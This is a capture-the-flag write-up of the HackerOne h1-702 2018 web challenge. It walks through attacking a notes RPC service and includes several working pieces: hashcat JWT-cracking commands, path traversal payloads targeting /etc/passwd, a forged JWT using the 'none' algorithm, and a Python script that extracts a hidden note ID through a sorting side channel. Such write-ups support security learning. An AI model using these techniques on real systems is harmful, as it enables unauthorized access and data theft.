This is a writeup of how I went about solving the web challenge from the h1-702 CTF, including my thought process as I navigated through the wrong and right paths to reach a solution. If you're only interested in what the correct steps were, skip to the TL;DR at the end.
Upon navigating to the challenge URL, we're greeted with a message:
Notes RPC Capture The Flag Welcome to HackerOne's H1-702 2018 Capture The Flag event. Somewhere on this server, a service can be found that allows a user to securely stores notes. In one of the notes, a flag is hidden. The goal is to obtain the flag. Good luck, you might need it.
Alright, let's see if we can find some other files on the webserver. The two best options from here are checking robots.txt
and running a file/directory search using common paths. Since /robots.txt
gives a 404 error, we can move on to the next option with dirsearch:
$ python3 dirsearch.py -u http://159.203.178.9/ -e php,html,txt
_|. _ _ _ _ _ _|_ v0.3.8
(_||| _) (/_(_|| (_| )
Extensions: php, html, txt | Threads: 10 | Wordlist size: 6657
Target: http://159.203.178.9/
[03:11:32] Starting:
[03:11:33] 403 - 299B - /.ht_wsr.txt
... <many more 403 errors>
[03:11:38] 200 - 597B - /index.html
[03:11:40] 200 - 11KB - /README.html
[03:11:40] 415 - 24B - /rpc.php
...
Task Completed
We've discovered two new files! Let's check out README.html
first.
This page details how to interact with an RPC service that's accessible through the other file dirsearch discovered: rpc.php
. To summarize, the service allows for the creation, retrieval, and deletion of text snippets ("notes"). In order to make my testing of this service easier, I started by writing a simple Python wrapper for it (later referenced as rpc.py
):
import requests
url = "http://159.203.178.9/rpc.php"
token = "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpZCI6Mn0.t4M7We66pxjMgRNGg1RvOmWT6rLtA8ZwJeNP-S8pVak"
GET = requests.get
POST = requests.post
def request(r, params=None, json=None):
headers = {'Authorization': token, 'Accept': 'application/notes.api.v1+json'}
resp = r(url, params=params, json=json, headers=headers)
try:
return resp.json()
except:
return resp
def getNotesMetadata():
return request(GET, params={'method': 'getNotesMetadata'})
def getNote(note_id):
return request(GET, params={'method': 'getNote', 'id': note_id})
def createNote(note, note_id=None):
if note_id is None:
return request(POST, params={'method': 'createNote'}, json={'note': note})
else:
return request(POST, params={'method': 'createNote'}, json={'id': note_id, 'note': note})
def resetNotes():
return request(POST, params={'method':'resetNotes'})
After messing around with the service's methods and carefully reading the information provided in the README file, I identified some initial high-potential attack vectors to explore:
- Modifying the JWT
- Path traversal through note IDs
- Server information disclosure through PHP errors
One important note from the README is that the service uses JSON Web Tokens (JWTs) to authenticate users:
Authenticating to the service can be done through the Authorization header. When provided a valid JWT, the service will authenticate the user and allow to query metadata, retrieve a note, create new notes, and delete all notes.
We can view the contents of the token provided in the README by base64 decoding each individual piece, but for its simplicity I like to let jwt.io handle the work:
From this I hypothesized that the payload's id
field needs to be changed to another user (likely id=1) who created the note with the flag in it. However, in-place modification of the payload will invalidate the JWT's signature. Given this, there were two possible options apparent to me:
- Hope for a broken implementation and attempt the modification anyway
- Crack the server's JWT secret so that a valid signature can be created after payload modification
If ignoring the signature, all that needs to be done to change the payload's id
field to 1
is to replace the payload section of the provided JWT with the base64 encoding of {"id":1}
(with padding stripped) - eyJpZCI6MX0
- yielding a new token:
token = "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpZCI6MX0.t4M7We66pxjMgRNGg1RvOmWT6rLtA8ZwJeNP-S8pVak"
Unfortunately after changing the token in rpc.py
to this new token, all requests failed with an authentication error, indicating that the signature was in fact being checked:
>>> rpc.getNotesMetadata()
{u'authorization': u'is invalid'}
It's possible that the JWT implementation was configured to use a weak user-defined secret instead of random bytes. To test this, we can attempt to crack the secret using password lists and/or full-on bruteforce. Thankfully, hashcat supports cracking JWTs. I attempted cracking with CrackStation's 15GB wordlist as well as up to a 6-character bruteforce, but both routes yielded no matches. I considered continuing the bruteforce with higher character lengths, but decided it was best to explore other vectors first. For anyone curious, the relevant hashcat commands are:
$ hashcat -m 16500 -a 0 <path_to_jwt> <path_to_wordlist> # use wordlist
$ hashcat -m 16500 -a 3 <path_to_jwt> ?a?a?a?a?a?a # 6-character bruteforce
The README mentions that notes are stored in files instead of a database:
Each note is stored in a secure file that consists of a unique key, the note, and the epoch of when the note was created.
Because of this, path traversal using the note id
parameter via getNote
could be a plausible vector. This quickly appeared to be a dead-end after trying numerous different traversal payloads, some of which are below:
>>> rpc.getNote('../../../../../../../../etc/passwd')
{u'note': u'is not found'}
>>> rpc.getNote('../../../../../../../../etc/passwd\x00')
{u'note': u'is not found'}
>>> rpc.getNote('/etc/passwd')
{u'note': u'is not found'}
>>> rpc.getNote('/etc/passwd\x00')
{u'note': u'is not found'}
>>> rpc.getNote('rpc.php')
{u'note': u'is not found'}
>>> rpc.getNote('../rpc.php')
{u'note': u'is not found'}
The display_errors
configuration setting is enabled by default in PHP, meaning that uncaught errors can be rendered in HTTP responses. Runtime error messages can often reveal sensitive application information, so with this vector I hoped to discover other PHP files that rpc.php
might be invoking - potentially widening the attack surface or revealing critical details. Because PHP is a weakly typed language, it's often trivial to throw errors by providing unexpected input types - which in this case would be non-strings. Specific to the Notes RPC service, non-string inputs can be provided through query string array parameters and JSON data types.
In PHP, query string parameters will be treated as an Array type if a pair of brackets immediately follows the parameter name like so: foo[]=123
. By default the example parameter is still accessed by the name "foo", so references to it without validating its type first will likely cause errors. Unfortunately this method did not cause any (visible) errors with the Notes RPC service:
>>> rpc.request(rpc.GET, params={'method[]': 'getNotesMetadata'})
{u'method': u'not found'}
>>> rpc.request(rpc.GET, params={'method': 'getNote', 'id[]':'xyz'})
{u'note': u'is not found'}
The JSON specification supports multiple different data types. Using sub-objects ({}
) in the JSON arguments to createNote
, I was able to trigger internal server errors (code 500) but unfortunately no error output was provided:
>>> rpc.createNote([])
{u'url': u'/rpc.php?method=getNote&id=a5fb2de26211ddcfc5713a6bed0c6328'}
>>> rpc.createNote({})
<Response [500]>
>>> rpc.createNote({}).text
u''
>>> rpc.createNote('asdf', note_id=[])
{u'url': u'/rpc.php?method=getNote&id=Array'}
>>> rpc.createNote('asdf', note_id={})
<Response [500]>
>>> rpc.createNote('asdf', note_id={}).text
u''
With none of the initial vectors providing progress, I decided to re-evaluate the service. After considering and briefly attempting other common vulnerabilities such as SQL/Command Injection, it became apparent that there may have been something more evident that I had missed. In my re-evaluation of how the service uses JWTs, I started looking into past vulnerabilities in common PHP JWT libraries. This quickly led me to discover that there was a critical issue found in many libraries back in 2015 - a warning about it still being shown on jwt.io (which I somehow glossed over earlier):
The details of this vulnerability can be found here. A summary of it:
- The JWT specification includes a
none
algorithm (specified in thealg
field of the token header) - This algorithm is intended to be used when the integrity of a token has already been verified
- Vulnerable implementations treated tokens signed with the
none
algorithm as valid regardless of their signature - This can be exploited by simply changing the
alg
field of the header tonone
and modifying the payload section to include any desired data
Using the modified token created earlier (in "Ignoring the Signature"), we simply need to change the header from:
{"typ":"JWT","alg":"HS256"}
to:
{"typ":"JWT","alg":"none"}
Like the modified payload, the new header just needs to be base64 encoded. Replacing the token header with this modified version gives the new token:
token = "eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJpZCI6MX0.t4M7We66pxjMgRNGg1RvOmWT6rLtA8ZwJeNP-S8pVak"
With the token now changed in rpc.py
, let's try calling getNotesMetadata
:
>>> rpc.getNotesMetadata()
{u'count': 1, u'epochs': [u'1528911533']}
Success! We now have the epoch
of what's likely the flag note. But wait, notes are accessed by id
not epoch
... Guess we're not done yet.
Now armed with the target note's epoch
, I decided that I probably needed to find a way to extract its id
based on the epoch
value. Per the README, note IDs are randomly generated unless one is provided when calling createNote
:
An optional ID. If not provided, it'll generate a 16 byte random string.
Noting that, I decided the two best approaches moving forward were:
- Looking into attacking the PRNG that generates note IDs
- Revisiting the recon stage to see if anything was missed
If the PRNG that generates note IDs was reversed, we in theory could recover the generated ID associated with the target note's epoch. Generally, attacking PRNGs involves a lot of guessing unless the target application is open-source. In the case of the Notes RPC service, we could hypothesize that PHP's mt_rand
or rand
functions are being used - both of which are known to be cryptographically insecure. However, attacks against these functions would be difficult to perform due to the generated numbers being bounded as well as not knowing how the charset is assembled. Given that, I decided to move on to something else so as not to waste too much time with guessing.
In the initial recon stage I had neglected to check the HTML source of the files discovered on the server. Low and behold, a very helpful HTML comment can be found in the source of README.html
:
<!--
Version 2 is in the making and being tested right now, it includes an optimized file format that
sorts the notes based on their unique key before saving them. This allows them to be queried faster.
Please do NOT use this in production yet!
-->
Jackpot! This gives us two new pieces of information:
- There's a version 2 API
- The next attack vector will probably involve version 2's sorting feature -
getNotesMetadata
being a primary candidate for that
The README file details the necessity of an Accept
header that specifies the API version being used:
Accept: application/notes.api.v1+json
So to access the version 2 API, we likely just need to change v1
to v2
, like so:
Accept: application/notes.api.v2+json
After changing this in rpc.py
and creating a few test notes, the theorized change to getNotesMetadata
is validated as note epochs now seem to be sorted based on the lexicographical ordering of note ID strings - not numerically by epoch as they were in version 1:
>>> rpc.createNote('asdf', note_id='C')
{u'url': u'/rpc.php?method=getNote&id=C'}
>>> rpc.createNote('asdf', note_id='A')
{u'url': u'/rpc.php?method=getNote&id=A'}
>>> rpc.createNote('asdf', note_id='B')
{u'url': u'/rpc.php?method=getNote&id=B'}
>>> rpc.getNotesMetadata()
{u'count': 4, u'epochs': [u'1529727460', u'1529727462', u'1529727456', u'1528911533']}
With this new sorting method we can perform a character-by-character bruteforce to extract the flag note's ID based on where a new note with a crafted ID appears in the list of note epochs generated by getNotesMetadata
.
In case my explanation of the issue was a bit confusing, let's consider a theoretical note with an id
of Y
:
>>> sorted(['X', 'Y'])
['X', 'Y']
>>> sorted(['Z', 'Y'])
['Y', 'Z']
When a note with an ID of X
is created, it will appear before Y
in the sorted-by-ID list of epochs. If a note with an ID of Z
is created, it will appear after Y
in the list of epochs. Once this pivot occurs, we're able to determine that the unknown character must be between X
and Z
(exclusive), narrowing it down to Y
in this case. That pivot search can be continued on a character-by-character basis until the full ID is extracted.
I wrote a Python script to automate the extraction process (later referenced as attack.py
):
import rpc
charset = sorted("0123456789abcdef")
target = "1528911533" # target note's epoch
key = ['?'] * 16 # key should be 16 characters
pos = 0
while pos < len(key):
found = False
for i in range(len(charset)):
# create key attempt using known values + current brute char
tmp_key = key[:]
tmp_key[pos] = charset[i]
tmp_key_str = ''.join(tmp_key).replace('?', charset[0])
# create note with id of key attempt to compare against unknown key
api.resetNotes()
api.createNote('asdf', note_id=tmp_key_str)
tmp_epoch = api.getNote(tmp_key_str)['epoch']
# use new note's epoch index to detect if next char has been found
if api.getNotesMetadata()['epochs'][1] == tmp_epoch:
key[pos] = charset[i - 1]
pos += 1
found = True
print(''.join(key).replace('?', ''))
break
if not found:
print('failed to get next char')
break
Oddly, the script failed when I tried to run it:
$ python attack.py
0
failed to get next char
After investigating and attempting to find out why, I recalled an important piece of info from the README:
400 | Returned when the ID does not match /\A[a-zA-Z0-9]+\z/.
Although the randomly generated note IDs only contained hex characters, note IDs can contain any characters in the a-zA-Z0-9
charset. After implementing this change in attack.py
:
import string
charset = sorted(string.ascii_letters + string.digits)
The script still failed with the same result as before. I theorized that the comparisons may be failing due to the target id
being longer than the randomly generated IDs (16 characters). After changing the key length in attack.py
to an arbitrarily larger number:
key = ['?'] * 128
The script finally started working!
E
Ee
Eel
...
EelHIXsuAw4FXCa9ep
EelHIXsuAw4FXCa9epe
EelHIXsuAw4FXCa9eped
failed to get next char
Sweet! Let's try to get that note now:
>>> rpc.getNote('EelHIXsuAw4FXCa9eped')
{u'note': u'is not found'}
WHAT?!?! After wanting to tear my hair out and taking another look at the script, it occurred to me that the comparison would fail on the last character because I didn't account for the final case where the two strings would be equal. To counter this, the value of the last character needs to be incremented (d -> e
):
>>> rpc.getNote('EelHIXsuAw4FXCa9epee')
{u'note': u'NzAyLUNURi1GTEFHOiBOUDI2bkRPSTZINUFTZW1BT1c2Zw==', u'epoch': u'1528911533'}
base64 decode that:
>>> base64.b64decode('NzAyLUNURi1GTEFHOiBOUDI2bkRPSTZINUFTZW1BT1c2Zw==')
'702-CTF-FLAG: NP26nDOI6H5ASemAOW6g'
We got the flag!
Thank you to HackerOne for hosting this fun and original challenge!
- Find the README detailing the Notes RPC service
- Exploit a JWT library flaw to change the provided JWT's user
id
to1
- See that the epoch of the flag note can now be accessed
- Find the HTML comment in the README mentioning API version 2 and its sorting functionality
- Exploit the sorting in version 2's
getNotesMetadata
method - extract unknown flag note'sid
based on string ordering
The final version of rpc.py
can be found here.
The final version of attack.py
can be found here.
As a side note, I'd like to mention that the key extraction could be made much more efficient by implementing a binary search algorithm. However, because the search space is relatively small, the added efficiency isn't really necessary so I opted to not implement it for the sake of simplicity.
Contact me on Twitter: @jsploit